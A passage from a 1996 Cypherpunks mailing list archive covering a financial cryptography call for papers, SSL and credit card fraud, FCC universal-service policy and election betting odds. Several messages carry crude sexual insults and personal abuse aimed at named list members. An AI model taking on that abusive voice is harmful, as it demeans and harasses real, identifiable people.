provides a wide array of Internet privacy services and powerful 
network security software.

Portions of Stronghold were developed by the Apache Group, and 
were taken with permission from the Apache Server 
http://www.apache.org/.  This product includes software developed 
by Ben Laurie for use in the Apache-SSL HTTP server project. This 
product includes software developed by Eric Young 
(eay@mincom.oz.au).

Netscape Navigator and Netscape Enterprise are trademarks of 
Netscape Communications Corporation. Microsoft Internet Explorer 
and Microsoft Internet Information Server are trademarks of 
Microsoft Corporation.  Stronghold is a trademark of Community 
ConneXion, Inc.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Y Do U Care <hevnsnt@ksu.edu>
Date: Sat, 21 Sep 1996 08:14:42 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: unscribe cypherpunks@toad.com
In-Reply-To: <199609191939.PAA21770@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960920163757.3174A-100000@cbs.ksu.ksu.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 19 Sep 1996, Perry E. Metzger wrote:

> 
> Steve Dyson writes:
> > unscribe cypherpunks@toad.com
> 
> Never.
> 
unscribe cypherpunks@toad.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 09:37:14 +0800
To: cypherpunks@toad.com
Subject: Re: Dimitri Spams
In-Reply-To: <Pine.SUN.3.91.960920144709.1223C-100000@beast.brainlink.com>
Message-ID: <VDNkuD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:

> Dimitri, get a life!  We need Dimitri Spams as much as we needed 
> Perrygrams.  Which is to say, we need them not at all!

I see you lied when you claimed to have killfiled me.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 21 Sep 1996 08:22:04 +0800
To: cypherpunks@toad.com
Subject: Re: ANYONES CREDIT CARD # per your request.
In-Reply-To: <9609201825.AA18161@super.mhv.net>
Message-ID: <Pine.LNX.3.95.960920171802.1143A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 20 Sep 1996, Lynne L. Harrison wrote:

>    You can go to their web page (http://www.lexis-nexis.com), click "Just
> In" and request via email that your name be removed from their database by
> filling out the form.
>    Problem, of course, is that one doesn't know if one's name and info is in
> the database unless one is a subscriber and can look it up.  I, personally,
> do not feel comfortable in filling out a form with my personal info and
> sending it along - 1) for the obvious reasons; and 2) what if I'm not even
> in their nefarious database?  If not, then I've just entered my personal
> info and sent it on its merry way to whomever and wherever unnecessarily -
> whether by email, fax, or snail mail.

There is an easy technical solution to this: store a one-way hash of each entry
in a database field, so if one wants to be removed, all one has to do is send
the one-way hash of their personal information.  If there is a database entry
that matches the hash, then it is up to the database maintainer to remove the
entry.  If there isn't a matching entry, then no personal information will have
been given out.  I wonder how many "privacy conscious" database maintainers
will actually implement a scheme like this.

>    I tried just entering my name, email address, and state but, as
> anticipated, received a msg that ALL info has to be supplied, so I'll chk
> with someone I know that has an account to see if my name is there.
>    However, the BIGGEST problem I foresee with this database (and others
> like it) is that someone eventually is going to hack it - and then watch the
> fun and games ensue.

TRW credit databases have been broken into many times, and they have more
information then Lexis-Nexis (credit-card numbers minus the last four digits,
addresses, telephone numbers, and of course, credit histories).  Nothing
really devestating has happened because of these incidents.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkMMxSzIPc7jvyFpAQFoiggAusskPBsG0cvMXYcCmJaJR6Rlbcny+48C
byAs3Bg4E2aMHusyll2+t7GPX897VtVGm1iBaAKZFkfFcyQcHoq+aw+hqJseG/As
Yz3x6702e6y4qOfv+JpyCJk9c19ys4XSkHqsrJl3txFvakrBP4xfstWtDKk2P1EH
4aIDvEaStdabqhMQqayKqU09tLY6A++XZ5zbzK/ovVDQIgCW2cDsmtYTo8ZVktPq
PqTnaHVY7B3oj+XEl7sfS1qKew4KEJiClmlztA7Lk7Kn6Zo6TnBPKOICFHjlnOyy
+gitMH7yYuGVo95jcRzImyDMm6z2mjcHTVlmEnxK2k85PtR9El3ZuQ==
=zaz8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Sat, 21 Sep 1996 08:30:39 +0800
Subject: RE: A daily warning regarding Tim C[ocksucker] Maya, the ...
Message-ID: <9608208432.AA843266540@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Subject: RE: A daily warning regarding Tim C[ocksucker] Maya, the lying s


nobody@cypherpunks.ca (John Anonymous MacDonald) wrote:
>Tim C Maya studied yoga back-streching exercises for 
> five years so he could blow himself.

Tim! Is the course still offered! Where do I sign up! 

James

Q: Why does a dog lick itself?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: R.Hirschfeld@cwi.nl
Date: Sat, 21 Sep 1996 03:36:19 +0800
To: cypherpunks@toad.com
Subject: Financial Cryptography '97 Call for Papers
Message-ID: <9609201543.AA27824=ray@groen.cwi.nl>
MIME-Version: 1.0
Content-Type: text/plain


		      Financial Cryptography '97
		  February 24-28 1997, Anguilla, BWI
			   CALL FOR PAPERS


General Information:

Financial Cryptography '97 (FC97) is a new conference on the security
of digital financial transactions.  The first meeting will be held on
the island of Anguilla in the British West Indies on February 24-28,
1997.  FC97 aims to bring together persons involved in both the
financial and data security fields to foster cooperation and exchange
of ideas.

Original papers are solicited on all aspects of financial data
security and digital commerce in general, including

    Anonymous Payments                      Fungibility       
    Authentication                          Home Banking       
    Communication Security                  Identification     
    Conditional Access                      Implementations    
    Copyright Protection                    Loss Tolerance     
    Credit/Debit Cards                      Loyalty Mechanisms 
    Currency Exchange                       Legal Aspects      
    Digital Cash                            Micropayments      
    Digital Receipts                        Network Payments   
    Digital Signatures                      Privacy Issues     
    Economic Implications                   Regulatory Issues  
    Electronic Funds Transfer               Smart Cards        
    Electronic Purses                       Standards
    Electronic Voting                       Tamper Resistance
    Electronic Wallets                      Transferability


Instructions for Authors:

Send a cover letter and 9 copies of an extended abstract to be
received by November 29, 1996 (or postmarked by November 15, 1996 and
sent via airmail) to the Program Chair at the address given below.

The extended abstract should start with the title and an abstract
followed by a succinct statement appropriate for a non-specialist
reader specifying the subject addressed, its background, the main
achievements, and their significance to financial data security.
Submissions are limited to 15 single-spaced pages of 12pt type.
Notification of acceptance or rejection will be sent to authors no
later than January 17, 1997.

Authors of accepted papers must guarantee that their paper will
be presented at the conference.


Additional Information:

Conference pricing and information on travel, hotels, and Anguilla
itself will follow in a separate general announcement.

A very limited number of stipends may be available to those unable to
obtain funding to attend the conference.  Students whose papers are
accepted and who will present the paper themselves are encouraged to
apply if such assistance is needed.  Requests for stipends should be
addressed to one of the General Chairs.

Those interested in becoming a sponsor of FC97 or in purchasing
exhibit space, please contact the Exhibits and Sponsorship Manager.

A workshop, intended for anyone with commercial software development
experience who wants hands-on familiarity with the issues and
technology of financial cryptography, is planned in conjunction with
FC97, to be held during the week preceding the conference.  For
information, please contact one of the General Chairs.


Send Submissions to:

Rafael Hirschfeld
FC97 Program Chair
CWI
Kruislaan 413
1098 SJ Amsterdam
The Netherlands
email: ray@cwi.nl
phone: +31 20 592 4169
fax: +31 20 592 4199


Program Committee:

Matthew Franklin, AT&T Laboratories--Research, Murray Hill, NJ, USA
Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
Rafael Hirschfeld, CWI, Amsterdam, The Netherlands
Arjen Lenstra, Citibank, New York, NY, USA
Mark Manasse, Digital Equipment Corporation, Palo Alto, CA, USA
Kevin McCurley, Sandia Laboratories, Albuquerque, NM, USA
Charles Merrill, McCarter & English, Newark, NJ, USA
Clifford Neuman, Information Sciences Institute, Marina del Rey, CA, USA
Sholom Rosen, Citibank, New York, NY, USA
Israel Sendrovic, Federal Reserve Bank of New York, New York, NY, USA


General Chairs:

Robert Hettinga, Shipwright, Boston, MA, USA
   <mailto: rah@shipwright.com>
Vincent Cate, Offshore Information Services, Anguilla, BWI
   <mailto: vince@offshore.com.ai>


Conference, Exhibits, and Sponsorship Manager:

Julie Rackliffe, Boston, MA, USA
   <mailto: rackliffe@tcm.org>


Workshop Leader:

Ian Goldberg, Berkeley, CA, USA
   <mailto: iang@cs.berkeley.edu>


Financial Cryptography '97 is held in cooperation with the
International Association for Cryptologic Research.

A copy of this call for papers as well as other information about the
conference will be available at URL http://www.cwi.nl/conferences/FC97.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "PETER JAMES HRABINSKY" <phrabins@eagle.wbm.ca>
Date: Sat, 21 Sep 1996 13:48:35 +0800
To: <cypherpunks@toad.com>
Subject: ? for everyone!!!!
Message-ID: <199609210321.VAA07927@eagle.wbm.ca>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have a simple password.cgi script for HTML
authorization/access?

If so, please send it to me...

Thank you for your time...

Peter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 21 Sep 1996 12:32:05 +0800
To: cypherpunks@toad.com
Subject: Anonymous Oddsman 2
Message-ID: <199609210230.TAA07235@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Current English U.S. Presidential betting odds are now offered on 2 services, but there's no Perot bet at Ladbroke House, and no Harry Browne on either.

Ladbrokes customer service @ +44 181 8621820 is still at Clinton 1:7, Dole 4:1 As promised, this time our roving reporter inquired about Harry Browne. The Libertarian candidate, once offered at 50:1 by Ladbroke House earlier this year, is not now offered. H. Ross Perot, perhaps reflecting the decision of the debate commission not to invite him, is also not offered at Ladbroke House.

The wonderful thing about a free gambling marketplace, though, is that you can always go elsewhere if you want to take a gamble on Ross. The William Hill customer helpline @ +44 990 181715 said Clinton 1:8, Dole 9:2 and for Perot they can give you a whopping 250:1!
Also, no odds given on Browne at William Hill, so in summary:

                   Ladbroke House         William Hill
 ------------------------------------------------------------
 Clinton	  1:7 (no change)           1:8
 Dole           4:1 (no change)           9:2
 Perot          (was 50:1 now 0)          250:1
 Browne       *                                    *
 ------------------------------------------------------------
*Not currently offered.

Next posting when we get around to it, or when the situation seems to have changed substantially. Many thanks to our roving reporter for these numbers.
anonymous oddsman.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 21 Sep 1996 13:03:03 +0800
To: pgf@acadian.net
Subject: Re: How's the list?
In-Reply-To: <Pine.SOL.3.93.960920193657.25437A-100000@stiletto.acadian.net>
Message-ID: <199609210245.TAA22366@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
> 
> 
> I thought I'd ask how the list is going... it seems to have gone
> downhill; there are now totally gratoitous insults to tcmay that
> don't seem to serve any purpose besides making sure the archive
> (if there is one) isn't fit for family viewing.

Mail filters are now virtually mandatory for reading cypherpunks.

> * I take it SSL still hasn't been strengthened?

SSLv3 has no known weakneses, other than the government-mandated
ones.  Of course there's always new ideas in breaking
crypto protocols, or new people working on it.

> * I'm now working part of the time at a company that has a lot of
> mail-order sales; are any of you aware of how much credit card fraud is
> going on out there right now?

No, how much?

> Might some of this actually be from unsecure SSL transactions?

Some of it might, however since there's about a zillion ways
to steal CC numbers that are even easier than brute-forcing GAKware
"export" SSL, I'd guess that the vast majority of CC fraud is
from other causes.  It's just so easy to go dumpster-diving
for credit slips behind Macys, or snoop in on people
phone-ordering goods over cellular or "portable" phones.
Why bother breaking SSL?  Why, that requires a computer!


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Sat, 21 Sep 1996 10:05:34 +0800
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: A daily warning regarding Tim C[ocksucker] Maya, the lying sack , of shit
In-Reply-To: <199609201738.KAA00561@abraham.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.91.960920194950.13549A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Sep 1996, John Anonymous MacDonald wrote:

> Tim C[ocksucker] Maya studied yoga back-streching exercises for 
> five years so he could blow himself (nobody else will).

Likely the NSA has nothing better to do these days.  They got bored with 
just listening, so now they're spamming.  Can we lock this fucker out of 
the list?  Sure, he'll probably pick another nym to post from...

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to   |KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK   |AK|        do you not understand?       |=======
===================http://www.brainlink.org/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Sat, 21 Sep 1996 11:03:25 +0800
To: cypherpunks@toad.com
Subject: How's the list?
Message-ID: <Pine.SOL.3.93.960920193657.25437A-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain



I thought I'd ask how the list is going... it seems to have gone
downhill; there are now totally gratoitous insults to tcmay that
don't seem to serve any purpose besides making sure the archive
(if there is one) isn't fit for family viewing.

Hey, at least when I was insensitive, I put effort into it. And
I didn't use an automatic daemon.

Anyway, I thought I'd catch up on current events with the following
questions:

* I take it SSL still hasn't been strengthened?

* I'm now working part of the time at a company that has a lot of
mail-order sales; are any of you aware of how much credit card fraud is
going on out there right now? Might some of this actually be from unsecure
SSL transactions?

* Did anyone come up with any interesting embellishments (or maybe
precedents?) to my bidirectional Dining Cryptographers idea? I can't
believe I'm the first to come up with this... I guess it's public domain
now, since I missed the one-year deadline for patenting it.

Well, I gotta run... 

Phil Fraering              "And the moral of the story is,
pgf@acadian.net            *never count your boobies until they
318/261-9649               are hatched*."
                            - James Thurber, "The Unicorn in the Garden"







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 21 Sep 1996 11:05:16 +0800
To: cypherpunks@toad.com
Subject: "This way to the egress"
Message-ID: <v03007804ae68e85edcb0@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


P.T. Barnum also said something about suckers, too...


Cheers,
Bob Hettinga

-----------------


First Data, First USA Paymentech, GE Capital Invest in First Virtual Holdings

Wednesday 96.09.18 - San Diego, CA USA - First Virtual Holdings, Inc.,
developer of Internet transaction systems, announced today that First Data
Corp. and First USA Paymentech, Inc., two of the nation's largest credit
card processing companies, and GE Capital have invested a total of $12.5
million in First Virtual Holdings, Inc.

"This strategic alliance reinforces our belief that electronic commerce is
coming of age on the Internet," said Lee Stein, chairman and chief executive
officer of First Virtual. "It creates a powerful new combination between
First Virtual, with its proven on-line transaction system, and leading
credit card acquiring and processing companies. This represents a tremendous
vote of confidence in our system by three industry leaders."

In addition, the companies are discussing joint marketing agreements based
on the concept of giving more than 200 million card holders automatic buying
power on the Internet using the secure VirtualPIN(TM) identifier from First
Virtual.

"We expect that this partnership will enable First Virtual to significantly
broaden its global marketing," Stein said. "Our secure e-mail based system
is proven, easy to use and doesn't require specialized technologies. The
VirtualPIN(TM) serves as the only identifier an individual needs for
conducting business in cyberspace. It enables sellers and buyers on the
Internet to link securely to any currency, payment system or standard
verification system. With First Data, First USA Paymentech and GE Capital as
partners, we anticipate more rapid acceptance of the Internet as an
important distribution channel for businesses of all sizes."

Stein said First Virtual created its VirtualPIN and Internet payment system
to be part of a more complex transactional e-mail system for future
marketing, customer service, communications and transaction applications.

"The VirtualPIN provides the single identifier that can tie together all
parts of the marketing and distribution chain: initial information, outbound
offer, purchase order, confirmation, credit verification, transaction
settlement and fulfilment of the order," said Stein. "The VirtualPIN serves
as a convenient and secure alias for an individual's identity, including e-
mail address and personal, demographic, shipping and financial information.
This gives new power and privacy to the individual and puts him or her at
the center of the electronic marketing universe."

Stein said Pamela Patsley, chief executive officer of First USA Paymentech,
Inc., and John McKinley, chief technology officer of GE Capital, have been
elected to the First Virtual board of directors.


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Sat, 21 Sep 1996 13:53:41 +0800
To: cypherpunks@toad.com
Subject: FCC's Hundt calls for univ service for Net, nixes iphone regs
Message-ID: <Pine.GSO.3.95.960920203928.10311B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


To the FCC's Reed Hundt, the Internet community is "governmentally
challenged." But then, the commission's chairman honestly believes
that FCC stands for "Friendly to Computer Communications."

Yeah, right.

That's what he said in a speech this week. The FCC faxed it to me
today after I returned from a Cato Institute conference -- where,
ironically enough, we spent a day talking about private ordering of
the Net. The concept makes a kind of intrinsic sense to me: who needs
government subsidies for Net connections when an account is just
$10/month?

The first half of the fax was mangled, thanks to the FCC's
anything-but-high-tech communications technology, so I shoved it in my
pocket and went for pizza with folks from the conference -- Eugene
Volokh, Charles Platt, Duncan Frissel, Alan Lewine, Solveig Bernstein,
and Brian LaMacchia. We chatted -- surprise! -- about the Feds' future
Net-regulation attempts.

When I got home and unfolded the fax, I found I could read the second
half. It was horrific. While Hundt did say he'd keep the FCC's hands
off of Net-telephony, he called for universal service for the Net.

Universal service is bad, from an economic perspective, for the same
reason that any subsidy scheme is bad: you're taking money out of one
part of the economy and pushing it into another. It's also vulnerable
to DC lobbyists in tasseled cordovan loafers descending on Capitol
Hill calling for more cash.

Hundt's scheme is more damming than it looks at first. In his speech,
Hundt calls for reconsidering how the FCC will "vote next year on a
new universal service funding mechanism."

This slush fund isn't funded from general taxpayer revenues. The 1996
Telecom dereg act directs the FCC to rework the payment mechanism that
feeds the universal service fund that all phone service providers must
pay into. It does things like make urban customers pay more to
subsidize rural telephone service. Companies that are eligible for
subsidies suck cash from the fund -- and of course lobby for more
along the way.

Now Hundt seems to want to wire schools from this fund. (And what
else? He doesn't quite say.) To replace the money from the account,
the FCC has to grab more from phone companies, which means higher
phone bills.

Does this make sense or what?

-Declan

(PS: Note Hundt's email address is rhundt@fcc.gov.)



********* (Keystroked by declan@well.com)

Reed Hundt speech excerpts:

"My hope is that the power of the Internet will forcedrive our
two-point FCC agenda -- competition in communications and public
benefits from communications. That's why we've resisted all efforts to
bring Internet communication within the out of date regulatory scheme
we have inherited at the FCC.

"The challenge now is for the govenmentally challenged Internet
community to figure out how to talk to the FCC on this subject and
what to say? After all, FCC stands for Friendly to Computer
Communications. After all I'm the first FCC chairman ever to be on the
Net -- so let me know -- rhundt@fcc.gov. What should our policies for
bandwidth growth look like?

"Now I'd like to move on to the second aspect of Hundt's Law, which is
that everyone needs access to the Internet, either at home, at school,
or in a library. Metcalfe's Law only applies when people can access
the network, and if they know how to take advantage of the network
access that is available to them... So even if we are successful in
meeting the bandwidth challenge, we must still ensure that there is
access.

[...]

"The investment to network our schools and libraries is so small and
the payoff so large. Look at the math... Can it be that we have a 700
billion-dollar-a-year information technology industry and yet we can't
afford to give every teacher the tools we give every shipping clerk at
Wal Mart? Or that we could afford to network every classroom by the
beginning of the next century, but somehow we just neglected to do it?
At the FCC we will vote next year on a new universal service funding
mechanism... The challenge I'm talking about is to provide bandwidth
and access to all Americans, but especially in kids in classrooms...

[Note that the 'we" paying for the shipping clerk's network is a
private corporation spending its own money. But the second "we" is the
government spending netizens' money. Guess the FCC can't tell the
difference. --Declan]

###







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 11:30:43 +0800
To: cypherpunks@toad.com
Subject: Re: CIA hacked
In-Reply-To: <9609201321.AA04474@elgreco.netapp.com>
Message-ID: <0NykuD13w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From koontz@netapp.com  Fri Sep 20 09:16:24 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Fri, 20 Sep 96 11:08:54 EDT
	for dlv
Received: from weaver-gw.netapp.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA10139 for dlv@bwalk.dm.com; Fri, 20 Sep 96 09:16:24 -0400
Received: from netapp.com ([192.9.200.1]) by weaver.netapp.com with SMTP id <15867-119>; Fri, 20 Sep 1996 06:17:39 +0100
Received: from elgreco.netapp.com by netapp.com (4.1/SMI-4.1)
	id AA19140; Fri, 20 Sep 96 06:16:19 PDT
Received: by elgreco.netapp.com (4.1/SMI-4.1)
	id AA04474; Fri, 20 Sep 96 06:21:50 PDT
Date: 	Fri, 20 Sep 96 06:21:50 PDT
From: koontz@netapp.com (Dave Koontz)
Message-Id: <9609201321.AA04474@elgreco.netapp.com>
To: dlv@bwalk.dm.com
Subject: Re: CIA hacked

>Who created you? You tub of shit?

Actually, english being my native language, and having paid attention
in school, that should be:

Who created you, you tub of shit?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 11:29:48 +0800
To: cypherpunks@toad.com
Subject: Re: CIA hacked
In-Reply-To: <v01540b02ae685d525f6c@[150.160.45.150]>
Message-ID: <1oykuD14w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


DMiskell@envirolink.org (Daniel Christopher Miskell) writes:
> >
> >Who created you? You tub of shit?
>
>
> Dude, why do you even bother?  It is simply not constructive to keep insulting
> and stabbing at people.  You gripe about the non-crypto-relevent stuff, then
> you go and create it repeatedly.  If you don't like what people have to say,
> take your potty mouth to another list.

You are confused. The above question was e-mailed to me by one of Timmy May's
friends. I just forward their e-mail to this mailing list. I don't read it.
If you have any comments about Timmy May's friends not knowing English,
trying to insult people, and posting non-crypto-relevant political rants,
address them to Timmy May and his friends.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 21 Sep 1996 20:50:42 +0800
To: cypherpunks@toad.com
Subject: Re: FCC's Hundt calls for univ service for Net, nixes iphone regs
Message-ID: <ae69185f00021004ca76@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:04 AM 9/21/96, David M. Rose wrote:
>On Fri, 20 Sep 1996, Declan McCullagh wrote:

>>[Note that the 'we" paying for the shipping clerk's network is a
>>private corporation spending its own money. But the second "we" is the
>>government spending netizens' money. Guess the FCC can't tell the
>>difference. --Declan]
>
>Correct. And if "we" fund universal service, then "we" don't want to see
>anything on the Net about non-GAK crypto, the right to bear arms, freedom of
>association, chemistry, non-clothed persons, taxes, etc. etc.  "We" feel
>that many if not "all American, but especially kids in classrooms" would be
>injured by these thoughts.

This is a terribly important point. If the "universal access" scheme is
approved and deployed, it gets the government back into the regulation of
the Net business. (I'm speaking of the "regulation of the Net" of the sort
that existed some years back, when "appropriate use" (scientific,
technical, educational, etc.) was the watchword, and casual chatter, GIFs,
etc. were called "inappropriate" by some.

The Constitutional issues of free speech would remain mostly unchanged even
if "universal access" happens, but the government would definitely get more
of a foot in the door than it has now.

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 11:20:52 +0800
To: cypherpunks@toad.com
Subject: RE: A daily warning regarding Tim C[ocksucker] Maya, the ...
In-Reply-To: <9608208432.AA843266540@smtplink.alis.ca>
Message-ID: <PXykuD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca writes:
> Subject: RE: A daily warning regarding Tim C[ocksucker] Maya, the lying s
>
>
> nobody@cypherpunks.ca (John Anonymous MacDonald) wrote:
> >Tim C Maya studied yoga back-streching exercises for=20
> > five years so he could blow himself.
>
> Tim! Is the course still offered! Where do I sign up!=20
>
> James
>
> Q: Why does a dog lick itself?

A: Because he can.

One day Timmy and Jimmy were hanging out and they saw a dog licking his balls.

"I wish I could do that," said Jimmy.

"You better pet him first," said Timmy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Sep 1996 11:26:39 +0800
To: cypherpunks@tad.com
Subject: Re: A daily warning regarding Timothy C. May
In-Reply-To: <843149202.18174.0@fatmans.demon.co.uk>
Message-ID: <N5ykuD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From paul@fatmans.demon.co.uk  Thu Sep 19 23:39:14 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Fri, 20 Sep 96 01:23:58 EDT
	for paul@fatmans.demon.co.uk
Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA02597 for dvl@bwalk.dm.com; Thu, 19 Sep 96 23:39:14 -0400
Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ah16490;
          19 Sep 96 17:22 BST
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
           id aa18174; 19 Sep 96 17:06 BST
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP 
	id AA843059897 ; Wed, 18 Sep 96 15:18:17 +0000
Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
From: paul@fatmans.demon.co.uk
To: dvl@bwalk.dm.com
Date: Wed, 18 Sep 1996 15:18:16 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: A daily warning regarding Timothy C. May
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.31)
Message-Id: <843149202.18174.0@fatmans.demon.co.uk>


> Timothy C. May is a lying sack of shit.

Look, that is enough, I`m going to move to have you removed from the 
list if you keep this up... get a life fuckhead, if you are going to 
flame at least do it from your real address so people can killfile 
you, or maybe you believe censorship is better?

 

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sat, 21 Sep 1996 12:22:18 +0800
To: cypherpunks@toad.com
Subject: RE: Fuckhead
